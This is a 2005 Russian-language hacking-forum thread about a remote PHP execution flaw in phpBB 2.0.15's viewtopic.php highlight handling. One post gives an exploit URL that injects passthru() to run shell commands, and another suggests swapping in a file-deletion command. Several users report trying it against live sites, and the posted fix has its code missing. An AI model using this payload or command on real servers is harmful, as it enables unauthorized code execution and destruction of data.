Форумы Уязвимости форумов phpbb 2.0.15

Discussion in 'Уязвимости CMS/форумов' started by exbbxak, 30 Jun 2005.

  1. exbbxak

    exbbxak New Member

    Joined:
    22 Apr 2005
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Выполнение произвольного PHP сценария в phpBB в коде highlighting
    Программа: phpBB 2.0.15

    Опасность: Высокая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

    Уязвимость существует из-за некорректного использования функции preg_replace() в сценарии 'viewtopic.php' при обработке входных данных. Удаленный пользователь может с помощью специально сформированного запроса заставить приложение интерпретировать входные данные как PHP сценарий и выполнить его.
     
    #1 exbbxak, 30 Jun 2005
    Last edited: 14 Jul 2005
  2. KLez

    KLez r00t

    Joined:
    17 May 2005
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Учись
    http://target/forum/viewtopic.php?t=243&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'
     
  3. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    280
    Likes Received:
    8
    Reputations:
    -1
    ни че не происходит!
     
  4. exbbxak

    exbbxak New Member

    Joined:
    22 Apr 2005
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    спасиб посмотрим
     
  5. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    280
    Likes Received:
    8
    Reputations:
    -1
    Если че найдешь то соообщи!
     
  6. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    280
    Likes Received:
    8
    Reputations:
    -1
    Незнаю, почем, но когда я выполняю его, то у меня страница грузиться намного дольше... Но на странице ничего нет, если команда "ls" выполняется невидимо, то можно было вместо "ls" поставить "rm viewtopic.php" и страница бы уже не грузилась... Но ничего не происходит!
     
  7. coyl

    coyl Elder - Старейшина

    Joined:
    14 Jan 2005
    Messages:
    125
    Likes Received:
    3
    Reputations:
    2
    ох уж мне этот пхпББ... =)
     
  8. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    защита:
    открыть viewtopic.php

    найти:
    заменить на:
     
  9. exbbxak

    exbbxak New Member

    Joined:
    22 Apr 2005
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Green_Bear
    спасибо
     
  10. coyl

    coyl Elder - Старейшина

    Joined:
    14 Jan 2005
    Messages:
    125
    Likes Received:
    3
    Reputations:
    2
    а еще лучшая защита - перейти на ипб или воблу. я уже. =)
     
  11. vorishka

    vorishka Elder - Старейшина

    Joined:
    3 Mar 2005
    Messages:
    309
    Likes Received:
    43
    Reputations:
    22
    Ребята, жизнь прекрасна или я мазахист. Но ничего не получается... Помогите...
     
  12. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    хрень какая-то..
    прошёлся по сайтам, и нихрена уязвимость не сработала..
     
  13. coyl

    coyl Elder - Старейшина

    Joined:
    14 Jan 2005
    Messages:
    125
    Likes Received:
    3
    Reputations:
    2
    такая же тема, но мне на данный момент это не надо.
     
  14. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    ХЗ, мож она и не работае :d.
    я тож на се проверял - ноль. или ошибка где.
     
  15. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    ошибка в том, видимо, кто осмелилися уязвимость на гл.странице выложить..
    хотя это уже брали.. но блин.. это наверно с перепою запостил Кондор..))) шучу..)
     
  16. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    ну тогда это уже не первая ошибка.... с версией 12 или 13, не помню уже, когда выложили видео как за 5 секнуд стать админом было намного.... *цензура*
     
  17. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    чето не работает!
     
  18. WeKSTiK

    WeKSTiK New Member

    Joined:
    15 Apr 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
  19. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    280
    Likes Received:
    8
    Reputations:
    -1
    А че вечером он может не работать? )))
     
  20. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    280
    Likes Received:
    8
    Reputations:
    -1
    Вы лажи сюда... А то региться не охота